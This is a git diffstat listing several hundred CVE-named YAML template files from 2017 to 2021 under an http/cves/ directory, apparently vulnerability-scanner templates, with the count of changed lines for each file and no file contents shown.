http/cves/2017/CVE-2017-12611.yaml | 3 +++ http/cves/2017/CVE-2017-12615.yaml | 2 ++ http/cves/2017/CVE-2017-12617.yaml | 2 ++ http/cves/2017/CVE-2017-12629.yaml | 3 +++ http/cves/2017/CVE-2017-12635.yaml | 1 + http/cves/2017/CVE-2017-12637.yaml | 1 + http/cves/2017/CVE-2017-12794.yaml | 3 ++- http/cves/2017/CVE-2017-14135.yaml | 4 +++- http/cves/2017/CVE-2017-14186.yaml | 3 ++- http/cves/2017/CVE-2017-14524.yaml | 2 +- http/cves/2017/CVE-2017-14535.yaml | 2 +- http/cves/2017/CVE-2017-14622.yaml | 2 +- http/cves/2017/CVE-2017-14651.yaml | 5 +++- http/cves/2017/CVE-2017-14849.yaml | 5 +++- http/cves/2017/CVE-2017-15715.yaml | 1 + http/cves/2017/CVE-2017-15944.yaml | 2 ++ http/cves/2017/CVE-2017-16806.yaml | 2 +- http/cves/2017/CVE-2017-16877.yaml | 2 ++ http/cves/2017/CVE-2017-17043.yaml | 3 +-- http/cves/2017/CVE-2017-17059.yaml | 6 ++--- http/cves/2017/CVE-2017-17451.yaml | 3 +-- http/cves/2017/CVE-2017-17562.yaml | 1 + http/cves/2017/CVE-2017-17736.yaml | 2 ++ http/cves/2017/CVE-2017-18024.yaml | 5 +++- http/cves/2017/CVE-2017-18487.yaml | 2 ++ http/cves/2017/CVE-2017-18490.yaml | 2 ++ http/cves/2017/CVE-2017-18491.yaml | 4 +++- http/cves/2017/CVE-2017-18492.yaml | 2 ++ http/cves/2017/CVE-2017-18493.yaml | 2 ++ http/cves/2017/CVE-2017-18494.yaml | 4 +++- http/cves/2017/CVE-2017-18496.yaml | 2 ++ http/cves/2017/CVE-2017-18500.yaml | 4 +++- http/cves/2017/CVE-2017-18501.yaml | 4 +++- http/cves/2017/CVE-2017-18502.yaml | 4 +++- http/cves/2017/CVE-2017-18505.yaml | 2 ++ http/cves/2017/CVE-2017-18516.yaml | 4 +++- http/cves/2017/CVE-2017-18517.yaml | 4 +++- http/cves/2017/CVE-2017-18518.yaml | 4 +++- http/cves/2017/CVE-2017-18527.yaml | 4 +++- http/cves/2017/CVE-2017-18528.yaml | 2 ++ http/cves/2017/CVE-2017-18529.yaml | 4 +++- http/cves/2017/CVE-2017-18530.yaml | 2 ++ http/cves/2017/CVE-2017-18532.yaml | 2 ++ http/cves/2017/CVE-2017-18536.yaml | 2 +- http/cves/2017/CVE-2017-18537.yaml | 4 +++- http/cves/2017/CVE-2017-18542.yaml | 4 +++- http/cves/2017/CVE-2017-18556.yaml | 4 +++- http/cves/2017/CVE-2017-18557.yaml | 4 +++- http/cves/2017/CVE-2017-18558.yaml | 4 +++- http/cves/2017/CVE-2017-18562.yaml | 4 +++- http/cves/2017/CVE-2017-18564.yaml | 4 +++- http/cves/2017/CVE-2017-18565.yaml | 4 +++- http/cves/2017/CVE-2017-18566.yaml | 4 +++- http/cves/2017/CVE-2017-18598.yaml | 3 +-- http/cves/2017/CVE-2017-18638.yaml | 4 ++-- http/cves/2017/CVE-2017-3506.yaml | 3 +++ http/cves/2017/CVE-2017-3528.yaml | 2 +- http/cves/2017/CVE-2017-4011.yaml | 2 +- http/cves/2017/CVE-2017-5631.yaml | 3 ++- http/cves/2017/CVE-2017-5638.yaml | 4 +++- http/cves/2017/CVE-2017-5689.yaml | 2 ++ http/cves/2017/CVE-2017-6090.yaml | 3 ++- http/cves/2017/CVE-2017-7269.yaml | 1 + http/cves/2017/CVE-2017-7391.yaml | 3 ++- http/cves/2017/CVE-2017-7615.yaml | 4 +++- http/cves/2017/CVE-2017-7855.yaml | 2 ++ http/cves/2017/CVE-2017-7921.yaml | 2 +- http/cves/2017/CVE-2017-7925.yaml | 1 + http/cves/2017/CVE-2017-8917.yaml | 3 ++- http/cves/2017/CVE-2017-9140.yaml | 2 +- http/cves/2017/CVE-2017-9416.yaml | 7 ++++-- http/cves/2017/CVE-2017-9506.yaml | 3 ++- http/cves/2017/CVE-2017-9791.yaml | 1 + http/cves/2017/CVE-2017-9805.yaml | 5 +++- http/cves/2017/CVE-2017-9822.yaml | 5 ++-- http/cves/2017/CVE-2017-9833.yaml | 2 +- http/cves/2018/CVE-2018-0127.yaml | 3 ++- http/cves/2018/CVE-2018-1000129.yaml | 2 +- http/cves/2018/CVE-2018-1000130.yaml | 4 +++- http/cves/2018/CVE-2018-1000226.yaml | 3 +++ http/cves/2018/CVE-2018-1000533.yaml | 1 + http/cves/2018/CVE-2018-1000671.yaml | 1 + http/cves/2018/CVE-2018-1000856.yaml | 4 ++-- http/cves/2018/CVE-2018-1000861.yaml | 6 +++-- http/cves/2018/CVE-2018-10141.yaml | 4 +++- http/cves/2018/CVE-2018-10230.yaml | 1 + http/cves/2018/CVE-2018-10562.yaml | 5 ++-- http/cves/2018/CVE-2018-10735.yaml | 3 ++- http/cves/2018/CVE-2018-10736.yaml | 7 +++--- http/cves/2018/CVE-2018-10737.yaml | 3 ++- http/cves/2018/CVE-2018-10738.yaml | 7 +++--- http/cves/2018/CVE-2018-10823.yaml | 4 ++-- http/cves/2018/CVE-2018-10942.yaml | 10 +++++++- http/cves/2018/CVE-2018-10956.yaml | 6 +++-- http/cves/2018/CVE-2018-11227.yaml | 1 + http/cves/2018/CVE-2018-11409.yaml | 3 +++ http/cves/2018/CVE-2018-11473.yaml | 5 ++-- http/cves/2018/CVE-2018-11709.yaml | 4 ++-- http/cves/2018/CVE-2018-11759.yaml | 2 ++ http/cves/2018/CVE-2018-11776.yaml | 5 +++- http/cves/2018/CVE-2018-11784.yaml | 6 +++-- http/cves/2018/CVE-2018-12031.yaml | 4 ++-- http/cves/2018/CVE-2018-12296.yaml | 3 +++ http/cves/2018/CVE-2018-12300.yaml | 3 +++ http/cves/2018/CVE-2018-12613.yaml | 8 +++++-- http/cves/2018/CVE-2018-12634.yaml | 4 ++-- http/cves/2018/CVE-2018-12675.yaml | 2 +- http/cves/2018/CVE-2018-1271.yaml | 2 +- http/cves/2018/CVE-2018-1335.yaml | 4 ++-- http/cves/2018/CVE-2018-13379.yaml | 1 + http/cves/2018/CVE-2018-13380.yaml | 4 +++- http/cves/2018/CVE-2018-13980.yaml | 2 +- http/cves/2018/CVE-2018-14013.yaml | 7 ++++-- http/cves/2018/CVE-2018-14474.yaml | 5 ++-- http/cves/2018/CVE-2018-14574.yaml | 5 ++-- http/cves/2018/CVE-2018-14912.yaml | 3 +++ http/cves/2018/CVE-2018-14916.yaml | 8 +++---- http/cves/2018/CVE-2018-14918.yaml | 5 ++-- http/cves/2018/CVE-2018-14931.yaml | 2 +- http/cves/2018/CVE-2018-15517.yaml | 2 +- http/cves/2018/CVE-2018-15535.yaml | 5 ++-- http/cves/2018/CVE-2018-15745.yaml | 7 ++++-- http/cves/2018/CVE-2018-15917.yaml | 5 ++-- http/cves/2018/CVE-2018-15961.yaml | 6 +++-- http/cves/2018/CVE-2018-16139.yaml | 4 +++- http/cves/2018/CVE-2018-16159.yaml | 2 ++ http/cves/2018/CVE-2018-16167.yaml | 2 +- http/cves/2018/CVE-2018-16283.yaml | 4 ++-- http/cves/2018/CVE-2018-16288.yaml | 2 +- http/cves/2018/CVE-2018-16716.yaml | 4 ++-- http/cves/2018/CVE-2018-16761.yaml | 7 ++++-- http/cves/2018/CVE-2018-16763.yaml | 7 ++++-- http/cves/2018/CVE-2018-16836.yaml | 2 +- http/cves/2018/CVE-2018-16979.yaml | 2 ++ http/cves/2018/CVE-2018-17153.yaml | 5 ++-- http/cves/2018/CVE-2018-17246.yaml | 3 +++ http/cves/2018/CVE-2018-17254.yaml | 7 ++++-- http/cves/2018/CVE-2018-17422.yaml | 4 +++- http/cves/2018/CVE-2018-18264.yaml | 4 ++-- http/cves/2018/CVE-2018-18323.yaml | 7 ++++-- http/cves/2018/CVE-2018-18570.yaml | 2 +- http/cves/2018/CVE-2018-18608.yaml | 1 + http/cves/2018/CVE-2018-18777.yaml | 6 +++-- http/cves/2018/CVE-2018-18778.yaml | 4 ++-- http/cves/2018/CVE-2018-18809.yaml | 5 ++-- http/cves/2018/CVE-2018-18925.yaml | 5 +++- http/cves/2018/CVE-2018-19137.yaml | 4 ++-- http/cves/2018/CVE-2018-19287.yaml | 7 ++++-- http/cves/2018/CVE-2018-19326.yaml | 5 ++-- http/cves/2018/CVE-2018-19365.yaml | 3 +++ http/cves/2018/CVE-2018-19386.yaml | 2 +- http/cves/2018/CVE-2018-19439.yaml | 4 ++-- http/cves/2018/CVE-2018-19458.yaml | 4 ++-- http/cves/2018/CVE-2018-19749.yaml | 4 ++-- http/cves/2018/CVE-2018-19752.yaml | 4 ++-- http/cves/2018/CVE-2018-19753.yaml | 5 ++-- http/cves/2018/CVE-2018-19914.yaml | 4 ++-- http/cves/2018/CVE-2018-19915.yaml | 4 ++-- http/cves/2018/CVE-2018-20009.yaml | 6 +++-- http/cves/2018/CVE-2018-20470.yaml | 4 ++-- http/cves/2018/CVE-2018-20526.yaml | 4 +++- http/cves/2018/CVE-2018-20824.yaml | 2 +- http/cves/2018/CVE-2018-20985.yaml | 4 ++-- http/cves/2018/CVE-2018-2791.yaml | 2 +- http/cves/2018/CVE-2018-2894.yaml | 3 +++ http/cves/2018/CVE-2018-3167.yaml | 4 ++-- http/cves/2018/CVE-2018-3238.yaml | 2 +- http/cves/2018/CVE-2018-5230.yaml | 4 ++-- http/cves/2018/CVE-2018-5233.yaml | 3 ++- http/cves/2018/CVE-2018-5715.yaml | 1 + http/cves/2018/CVE-2018-6008.yaml | 4 +++- http/cves/2018/CVE-2018-6184.yaml | 3 ++- http/cves/2018/CVE-2018-6200.yaml | 3 +++ http/cves/2018/CVE-2018-6910.yaml | 2 ++ http/cves/2018/CVE-2018-7251.yaml | 2 +- http/cves/2018/CVE-2018-7282.yaml | 6 +++-- http/cves/2018/CVE-2018-7467.yaml | 3 ++- http/cves/2018/CVE-2018-7600.yaml | 2 +- http/cves/2018/CVE-2018-7602.yaml | 4 ++-- http/cves/2018/CVE-2018-7653.yaml | 3 ++- http/cves/2018/CVE-2018-7662.yaml | 4 ++-- http/cves/2018/CVE-2018-7700.yaml | 2 ++ http/cves/2018/CVE-2018-8006.yaml | 3 ++- http/cves/2018/CVE-2018-8033.yaml | 4 +++- http/cves/2018/CVE-2018-8715.yaml | 1 + http/cves/2018/CVE-2018-8719.yaml | 2 +- http/cves/2018/CVE-2018-8823.yaml | 2 +- http/cves/2018/CVE-2018-9118.yaml | 2 +- http/cves/2018/CVE-2018-9205.yaml | 2 +- http/cves/2019/CVE-2019-0193.yaml | 3 +++ http/cves/2019/CVE-2019-0221.yaml | 6 +++-- http/cves/2019/CVE-2019-0230.yaml | 3 +++ http/cves/2019/CVE-2019-10068.yaml | 1 + http/cves/2019/CVE-2019-10092.yaml | 3 ++- http/cves/2019/CVE-2019-10098.yaml | 1 + http/cves/2019/CVE-2019-1010290.yaml | 2 +- http/cves/2019/CVE-2019-10405.yaml | 1 + http/cves/2019/CVE-2019-10475.yaml | 4 ++-- http/cves/2019/CVE-2019-10692.yaml | 5 ++-- http/cves/2019/CVE-2019-10717.yaml | 5 ++-- http/cves/2019/CVE-2019-10758.yaml | 6 +++-- http/cves/2019/CVE-2019-11248.yaml | 7 ++++-- http/cves/2019/CVE-2019-11370.yaml | 5 ++-- http/cves/2019/CVE-2019-11510.yaml | 3 +++ http/cves/2019/CVE-2019-11580.yaml | 2 +- http/cves/2019/CVE-2019-11581.yaml | 4 ++-- http/cves/2019/CVE-2019-11869.yaml | 4 ++-- http/cves/2019/CVE-2019-12276.yaml | 4 ++-- http/cves/2019/CVE-2019-12314.yaml | 4 ++-- http/cves/2019/CVE-2019-12461.yaml | 4 ++-- http/cves/2019/CVE-2019-12581.yaml | 2 ++ http/cves/2019/CVE-2019-12583.yaml | 5 +++- http/cves/2019/CVE-2019-12593.yaml | 5 ++-- http/cves/2019/CVE-2019-12616.yaml | 6 ++++- http/cves/2019/CVE-2019-12725.yaml | 5 +++- http/cves/2019/CVE-2019-12962.yaml | 5 ++-- http/cves/2019/CVE-2019-12985.yaml | 2 ++ http/cves/2019/CVE-2019-12986.yaml | 6 +++-- http/cves/2019/CVE-2019-12987.yaml | 6 +++-- http/cves/2019/CVE-2019-12988.yaml | 2 ++ http/cves/2019/CVE-2019-12990.yaml | 6 +++-- http/cves/2019/CVE-2019-13101.yaml | 8 +++---- http/cves/2019/CVE-2019-13392.yaml | 5 ++-- http/cves/2019/CVE-2019-13396.yaml | 4 ++-- http/cves/2019/CVE-2019-13462.yaml | 3 +++ http/cves/2019/CVE-2019-14205.yaml | 2 +- http/cves/2019/CVE-2019-14223.yaml | 4 ++-- http/cves/2019/CVE-2019-14251.yaml | 4 ++-- http/cves/2019/CVE-2019-14312.yaml | 4 ++-- http/cves/2019/CVE-2019-14322.yaml | 11 +++++---- http/cves/2019/CVE-2019-14530.yaml | 7 ++++-- http/cves/2019/CVE-2019-14696.yaml | 2 +- http/cves/2019/CVE-2019-14750.yaml | 6 +++-- http/cves/2019/CVE-2019-14789.yaml | 2 +- http/cves/2019/CVE-2019-14974.yaml | 3 +++ http/cves/2019/CVE-2019-15043.yaml | 6 +++-- http/cves/2019/CVE-2019-15107.yaml | 3 +++ http/cves/2019/CVE-2019-15501.yaml | 3 ++- http/cves/2019/CVE-2019-15642.yaml | 2 ++ http/cves/2019/CVE-2019-15713.yaml | 2 +- http/cves/2019/CVE-2019-15829.yaml | 2 ++ http/cves/2019/CVE-2019-15858.yaml | 4 ++-- http/cves/2019/CVE-2019-15889.yaml | 5 ++-- http/cves/2019/CVE-2019-16057.yaml | 1 + http/cves/2019/CVE-2019-16097.yaml | 2 ++ http/cves/2019/CVE-2019-16278.yaml | 4 ++-- http/cves/2019/CVE-2019-16469.yaml | 2 ++ http/cves/2019/CVE-2019-16662.yaml | 3 +++ http/cves/2019/CVE-2019-16759.yaml | 2 ++ http/cves/2019/CVE-2019-16931.yaml | 4 ++-- http/cves/2019/CVE-2019-16997.yaml | 4 ++-- http/cves/2019/CVE-2019-17382.yaml | 3 +++ http/cves/2019/CVE-2019-17444.yaml | 3 ++- http/cves/2019/CVE-2019-17538.yaml | 4 ++-- http/cves/2019/CVE-2019-17558.yaml | 3 +++ http/cves/2019/CVE-2019-17574.yaml | 6 +++-- http/cves/2019/CVE-2019-17662.yaml | 1 + http/cves/2019/CVE-2019-1821.yaml | 6 +++-- http/cves/2019/CVE-2019-18371.yaml | 6 +++-- http/cves/2019/CVE-2019-18393.yaml | 7 +++++- http/cves/2019/CVE-2019-18394.yaml | 9 ++++++-- http/cves/2019/CVE-2019-1898.yaml | 1 + http/cves/2019/CVE-2019-19368.yaml | 2 +- http/cves/2019/CVE-2019-20085.yaml | 2 +- http/cves/2019/CVE-2019-20141.yaml | 3 ++- http/cves/2019/CVE-2019-20210.yaml | 2 +- http/cves/2019/CVE-2019-20224.yaml | 3 +++ http/cves/2019/CVE-2019-20933.yaml | 2 ++ http/cves/2019/CVE-2019-2616.yaml | 4 ++-- http/cves/2019/CVE-2019-2729.yaml | 4 ++-- http/cves/2019/CVE-2019-3398.yaml | 1 + http/cves/2019/CVE-2019-3403.yaml | 2 +- http/cves/2019/CVE-2019-3799.yaml | 4 ++-- http/cves/2019/CVE-2019-3911.yaml | 4 +++- http/cves/2019/CVE-2019-3912.yaml | 2 ++ http/cves/2019/CVE-2019-3929.yaml | 4 ++-- http/cves/2019/CVE-2019-5127.yaml | 2 +- http/cves/2019/CVE-2019-5418.yaml | 1 + http/cves/2019/CVE-2019-5434.yaml | 2 ++ http/cves/2019/CVE-2019-6112.yaml | 2 +- http/cves/2019/CVE-2019-6340.yaml | 4 ++-- http/cves/2019/CVE-2019-6715.yaml | 4 ++-- http/cves/2019/CVE-2019-6799.yaml | 1 + http/cves/2019/CVE-2019-6802.yaml | 1 + http/cves/2019/CVE-2019-7192.yaml | 2 ++ http/cves/2019/CVE-2019-7219.yaml | 2 +- http/cves/2019/CVE-2019-7238.yaml | 3 ++- http/cves/2019/CVE-2019-7254.yaml | 3 +++ http/cves/2019/CVE-2019-7255.yaml | 2 ++ http/cves/2019/CVE-2019-7256.yaml | 8 ++++--- http/cves/2019/CVE-2019-7315.yaml | 8 +++---- http/cves/2019/CVE-2019-7609.yaml | 3 +++ http/cves/2019/CVE-2019-8086.yaml | 2 ++ http/cves/2019/CVE-2019-8390.yaml | 6 +++-- http/cves/2019/CVE-2019-8442.yaml | 2 +- http/cves/2019/CVE-2019-8446.yaml | 2 +- http/cves/2019/CVE-2019-8449.yaml | 4 ++-- http/cves/2019/CVE-2019-8937.yaml | 3 +++ http/cves/2019/CVE-2019-8982.yaml | 4 ++-- http/cves/2019/CVE-2019-9618.yaml | 4 ++-- http/cves/2019/CVE-2019-9632.yaml | 4 ++-- http/cves/2019/CVE-2019-9670.yaml | 7 ++++-- http/cves/2019/CVE-2019-9726.yaml | 2 +- http/cves/2019/CVE-2019-9733.yaml | 5 ++-- http/cves/2019/CVE-2019-9915.yaml | 2 +- http/cves/2019/CVE-2019-9922.yaml | 6 +++-- http/cves/2020/CVE-2020-0618.yaml | 4 ++-- http/cves/2020/CVE-2020-10199.yaml | 5 ++-- http/cves/2020/CVE-2020-10220.yaml | 4 +++- http/cves/2020/CVE-2020-10546.yaml | 5 +++- http/cves/2020/CVE-2020-10547.yaml | 3 +++ http/cves/2020/CVE-2020-10548.yaml | 3 +++ http/cves/2020/CVE-2020-10549.yaml | 5 +++- http/cves/2020/CVE-2020-10770.yaml | 8 +++++-- http/cves/2020/CVE-2020-10973.yaml | 1 + http/cves/2020/CVE-2020-11034.yaml | 3 +++ http/cves/2020/CVE-2020-11110.yaml | 2 ++ http/cves/2020/CVE-2020-11450.yaml | 4 ++-- http/cves/2020/CVE-2020-11530.yaml | 2 +- http/cves/2020/CVE-2020-11546.yaml | 2 ++ http/cves/2020/CVE-2020-11547.yaml | 4 +++- http/cves/2020/CVE-2020-11710.yaml | 1 + http/cves/2020/CVE-2020-11738.yaml | 1 + http/cves/2020/CVE-2020-11798.yaml | 1 + http/cves/2020/CVE-2020-11853.yaml | 4 ++-- http/cves/2020/CVE-2020-11854.yaml | 4 ++-- http/cves/2020/CVE-2020-11930.yaml | 4 +++- http/cves/2020/CVE-2020-11978.yaml | 6 +++-- http/cves/2020/CVE-2020-11991.yaml | 7 ++++-- http/cves/2020/CVE-2020-12054.yaml | 2 +- http/cves/2020/CVE-2020-12116.yaml | 6 ++++- http/cves/2020/CVE-2020-12124.yaml | 6 +++-- http/cves/2020/CVE-2020-12127.yaml | 5 ++-- http/cves/2020/CVE-2020-12256.yaml | 2 ++ http/cves/2020/CVE-2020-12259.yaml | 4 +++- http/cves/2020/CVE-2020-12478.yaml | 5 ++-- http/cves/2020/CVE-2020-12720.yaml | 7 ++++-- http/cves/2020/CVE-2020-13117.yaml | 8 +++---- http/cves/2020/CVE-2020-13121.yaml | 2 +- http/cves/2020/CVE-2020-13158.yaml | 2 ++ http/cves/2020/CVE-2020-13167.yaml | 6 +++-- http/cves/2020/CVE-2020-13258.yaml | 2 +- http/cves/2020/CVE-2020-13379.yaml | 6 +++-- http/cves/2020/CVE-2020-13405.yaml | 5 +++- http/cves/2020/CVE-2020-13483.yaml | 4 +++- http/cves/2020/CVE-2020-13638.yaml | 6 +++-- http/cves/2020/CVE-2020-13820.yaml | 4 +++- http/cves/2020/CVE-2020-13851.yaml | 2 ++ http/cves/2020/CVE-2020-13927.yaml | 6 +++-- http/cves/2020/CVE-2020-13937.yaml | 2 ++ http/cves/2020/CVE-2020-13945.yaml | 3 +++ http/cves/2020/CVE-2020-14144.yaml | 6 +++-- http/cves/2020/CVE-2020-14179.yaml | 7 ++++-- http/cves/2020/CVE-2020-14181.yaml | 4 ++-- http/cves/2020/CVE-2020-14408.yaml | 4 +++- http/cves/2020/CVE-2020-14413.yaml | 2 +- http/cves/2020/CVE-2020-14750.yaml | 4 +++- http/cves/2020/CVE-2020-14864.yaml | 3 +++ http/cves/2020/CVE-2020-14882.yaml | 3 +++ http/cves/2020/CVE-2020-14883.yaml | 2 ++ http/cves/2020/CVE-2020-15129.yaml | 3 +++ http/cves/2020/CVE-2020-15148.yaml | 4 ++-- http/cves/2020/CVE-2020-15227.yaml | 2 +- http/cves/2020/CVE-2020-15500.yaml | 6 +++-- http/cves/2020/CVE-2020-15568.yaml | 1 + http/cves/2020/CVE-2020-15867.yaml | 3 +++ http/cves/2020/CVE-2020-15895.yaml | 3 ++- http/cves/2020/CVE-2020-16139.yaml | 4 ++-- http/cves/2020/CVE-2020-16846.yaml | 2 +- http/cves/2020/CVE-2020-16952.yaml | 4 ++-- http/cves/2020/CVE-2020-17362.yaml | 2 +- http/cves/2020/CVE-2020-17453.yaml | 5 +++- http/cves/2020/CVE-2020-17456.yaml | 8 +++---- http/cves/2020/CVE-2020-17463.yaml | 2 ++ http/cves/2020/CVE-2020-17496.yaml | 7 ++++-- http/cves/2020/CVE-2020-17505.yaml | 4 ++-- http/cves/2020/CVE-2020-17519.yaml | 6 ++--- http/cves/2020/CVE-2020-17526.yaml | 6 +++-- http/cves/2020/CVE-2020-17530.yaml | 3 +++ http/cves/2020/CVE-2020-18268.yaml | 2 +- http/cves/2020/CVE-2020-19282.yaml | 1 + http/cves/2020/CVE-2020-19283.yaml | 3 ++- http/cves/2020/CVE-2020-19360.yaml | 2 +- http/cves/2020/CVE-2020-1943.yaml | 6 +++-- http/cves/2020/CVE-2020-19515.yaml | 5 ++-- http/cves/2020/CVE-2020-1956.yaml | 1 + http/cves/2020/CVE-2020-20285.yaml | 5 ++-- http/cves/2020/CVE-2020-20300.yaml | 1 + http/cves/2020/CVE-2020-2036.yaml | 4 +++- http/cves/2020/CVE-2020-2096.yaml | 4 +++- http/cves/2020/CVE-2020-20982.yaml | 5 ++-- http/cves/2020/CVE-2020-21012.yaml | 4 ++-- http/cves/2020/CVE-2020-2103.yaml | 5 ++-- http/cves/2020/CVE-2020-2140.yaml | 2 +- http/cves/2020/CVE-2020-22208.yaml | 5 ++-- http/cves/2020/CVE-2020-22209.yaml | 4 ++-- http/cves/2020/CVE-2020-22210.yaml | 4 ++-- http/cves/2020/CVE-2020-22211.yaml | 4 ++-- http/cves/2020/CVE-2020-23015.yaml | 5 +++- http/cves/2020/CVE-2020-23517.yaml | 5 ++-- http/cves/2020/CVE-2020-23575.yaml | 6 +++-- http/cves/2020/CVE-2020-23697.yaml | 4 +++- http/cves/2020/CVE-2020-24148.yaml | 5 ++-- http/cves/2020/CVE-2020-24186.yaml | 4 ++-- http/cves/2020/CVE-2020-24312.yaml | 4 ++-- http/cves/2020/CVE-2020-24391.yaml | 3 +++ http/cves/2020/CVE-2020-24579.yaml | 4 ++-- http/cves/2020/CVE-2020-24589.yaml | 7 ++++-- http/cves/2020/CVE-2020-24701.yaml | 5 ++-- http/cves/2020/CVE-2020-24902.yaml | 3 ++- http/cves/2020/CVE-2020-24903.yaml | 2 +- http/cves/2020/CVE-2020-24912.yaml | 2 +- http/cves/2020/CVE-2020-25213.yaml | 4 ++-- http/cves/2020/CVE-2020-25223.yaml | 7 ++++-- http/cves/2020/CVE-2020-25506.yaml | 2 ++ http/cves/2020/CVE-2020-2551.yaml | 9 ++++++-- http/cves/2020/CVE-2020-25540.yaml | 4 ++-- http/cves/2020/CVE-2020-25864.yaml | 5 +++- http/cves/2020/CVE-2020-26214.yaml | 4 ++-- http/cves/2020/CVE-2020-26217.yaml | 2 +- http/cves/2020/CVE-2020-26413.yaml | 6 +++-- http/cves/2020/CVE-2020-26948.yaml | 3 +++ http/cves/2020/CVE-2020-2733.yaml | 4 ++-- http/cves/2020/CVE-2020-27467.yaml | 2 ++ http/cves/2020/CVE-2020-27481.yaml | 4 ++-- http/cves/2020/CVE-2020-27838.yaml | 2 ++ http/cves/2020/CVE-2020-27866.yaml | 4 ++-- http/cves/2020/CVE-2020-27982.yaml | 6 +++-- http/cves/2020/CVE-2020-27986.yaml | 4 ++-- http/cves/2020/CVE-2020-28185.yaml | 2 +- http/cves/2020/CVE-2020-28188.yaml | 5 ++-- http/cves/2020/CVE-2020-28208.yaml | 3 +++ http/cves/2020/CVE-2020-28871.yaml | 7 +++--- http/cves/2020/CVE-2020-29164.yaml | 2 +- http/cves/2020/CVE-2020-29227.yaml | 6 +++-- http/cves/2020/CVE-2020-29284.yaml | 4 ++-- http/cves/2020/CVE-2020-29395.yaml | 9 +++++--- http/cves/2020/CVE-2020-29583.yaml | 6 +++-- http/cves/2020/CVE-2020-3452.yaml | 8 +++---- http/cves/2020/CVE-2020-35234.yaml | 4 ++-- http/cves/2020/CVE-2020-35338.yaml | 4 ++-- http/cves/2020/CVE-2020-35476.yaml | 1 + http/cves/2020/CVE-2020-35489.yaml | 4 ++-- http/cves/2020/CVE-2020-35580.yaml | 2 +- http/cves/2020/CVE-2020-35598.yaml | 4 ++-- http/cves/2020/CVE-2020-35713.yaml | 4 ++-- http/cves/2020/CVE-2020-35736.yaml | 4 +++- http/cves/2020/CVE-2020-3580.yaml | 6 +++-- http/cves/2020/CVE-2020-35846.yaml | 6 +++-- http/cves/2020/CVE-2020-35847.yaml | 5 ++-- http/cves/2020/CVE-2020-35848.yaml | 6 +++-- http/cves/2020/CVE-2020-35984.yaml | 1 + http/cves/2020/CVE-2020-35985.yaml | 2 ++ http/cves/2020/CVE-2020-35986.yaml | 1 + http/cves/2020/CVE-2020-35987.yaml | 2 ++ http/cves/2020/CVE-2020-36112.yaml | 4 ++-- http/cves/2020/CVE-2020-36289.yaml | 4 ++-- http/cves/2020/CVE-2020-36365.yaml | 1 + http/cves/2020/CVE-2020-4463.yaml | 1 + http/cves/2020/CVE-2020-5191.yaml | 6 ++++- http/cves/2020/CVE-2020-5192.yaml | 4 +++- http/cves/2020/CVE-2020-5284.yaml | 4 +++- http/cves/2020/CVE-2020-5410.yaml | 6 ++--- http/cves/2020/CVE-2020-5777.yaml | 4 ++-- http/cves/2020/CVE-2020-5902.yaml | 3 +++ http/cves/2020/CVE-2020-6171.yaml | 4 +++- http/cves/2020/CVE-2020-6207.yaml | 4 ++-- http/cves/2020/CVE-2020-6287.yaml | 3 ++- http/cves/2020/CVE-2020-6637.yaml | 4 +++- http/cves/2020/CVE-2020-6950.yaml | 2 +- http/cves/2020/CVE-2020-7107.yaml | 3 +-- http/cves/2020/CVE-2020-7136.yaml | 2 +- http/cves/2020/CVE-2020-7318.yaml | 6 ++++- http/cves/2020/CVE-2020-7796.yaml | 3 +++ http/cves/2020/CVE-2020-7943.yaml | 5 ++-- http/cves/2020/CVE-2020-7961.yaml | 2 ++ http/cves/2020/CVE-2020-7980.yaml | 6 +++-- http/cves/2020/CVE-2020-8115.yaml | 5 +++- http/cves/2020/CVE-2020-8163.yaml | 1 + http/cves/2020/CVE-2020-8191.yaml | 2 +- http/cves/2020/CVE-2020-8193.yaml | 2 +- http/cves/2020/CVE-2020-8497.yaml | 3 +++ http/cves/2020/CVE-2020-8512.yaml | 4 +++- http/cves/2020/CVE-2020-8515.yaml | 2 +- http/cves/2020/CVE-2020-8615.yaml | 6 +++-- http/cves/2020/CVE-2020-8641.yaml | 2 +- http/cves/2020/CVE-2020-8644.yaml | 4 ++-- http/cves/2020/CVE-2020-8772.yaml | 4 ++-- http/cves/2020/CVE-2020-8813.yaml | 3 +++ http/cves/2020/CVE-2020-8982.yaml | 4 ++-- http/cves/2020/CVE-2020-9036.yaml | 3 +++ http/cves/2020/CVE-2020-9315.yaml | 1 + http/cves/2020/CVE-2020-9344.yaml | 2 +- http/cves/2020/CVE-2020-9376.yaml | 2 +- http/cves/2020/CVE-2020-9402.yaml | 1 + http/cves/2020/CVE-2020-9425.yaml | 9 ++++++-- http/cves/2020/CVE-2020-9484.yaml | 2 ++ http/cves/2020/CVE-2020-9496.yaml | 2 ++ http/cves/2020/CVE-2020-9757.yaml | 3 +++ http/cves/2021/CVE-2021-1472.yaml | 1 + http/cves/2021/CVE-2021-1498.yaml | 4 ++-- http/cves/2021/CVE-2021-1499.yaml | 8 +++---- http/cves/2021/CVE-2021-20031.yaml | 8 +++---- http/cves/2021/CVE-2021-20091.yaml | 7 +++--- http/cves/2021/CVE-2021-20114.yaml | 4 ++-- http/cves/2021/CVE-2021-20123.yaml | 5 ++-- http/cves/2021/CVE-2021-20124.yaml | 5 ++-- http/cves/2021/CVE-2021-20137.yaml | 8 +++---- http/cves/2021/CVE-2021-20150.yaml | 1 + http/cves/2021/CVE-2021-20158.yaml | 1 + http/cves/2021/CVE-2021-20167.yaml | 2 +- http/cves/2021/CVE-2021-20323.yaml | 4 +++- http/cves/2021/CVE-2021-20792.yaml | 4 ++-- http/cves/2021/CVE-2021-20837.yaml | 5 +++- http/cves/2021/CVE-2021-21087.yaml | 6 +++-- http/cves/2021/CVE-2021-21234.yaml | 4 ++-- http/cves/2021/CVE-2021-21287.yaml | 7 ++++-- http/cves/2021/CVE-2021-21307.yaml | 4 ++-- http/cves/2021/CVE-2021-21311.yaml | 5 ++-- http/cves/2021/CVE-2021-21351.yaml | 4 ++-- http/cves/2021/CVE-2021-21389.yaml | 2 +- http/cves/2021/CVE-2021-21402.yaml | 5 ++-- http/cves/2021/CVE-2021-21745.yaml | 2 +- http/cves/2021/CVE-2021-21799.yaml | 8 +++++-- http/cves/2021/CVE-2021-21800.yaml | 5 ++-- http/cves/2021/CVE-2021-21801.yaml | 2 ++ http/cves/2021/CVE-2021-21802.yaml | 6 +++-- http/cves/2021/CVE-2021-21803.yaml | 6 +++-- http/cves/2021/CVE-2021-21805.yaml | 1 + http/cves/2021/CVE-2021-21978.yaml | 4 ++-- http/cves/2021/CVE-2021-22005.yaml | 4 ++-- http/cves/2021/CVE-2021-22053.yaml | 4 ++-- 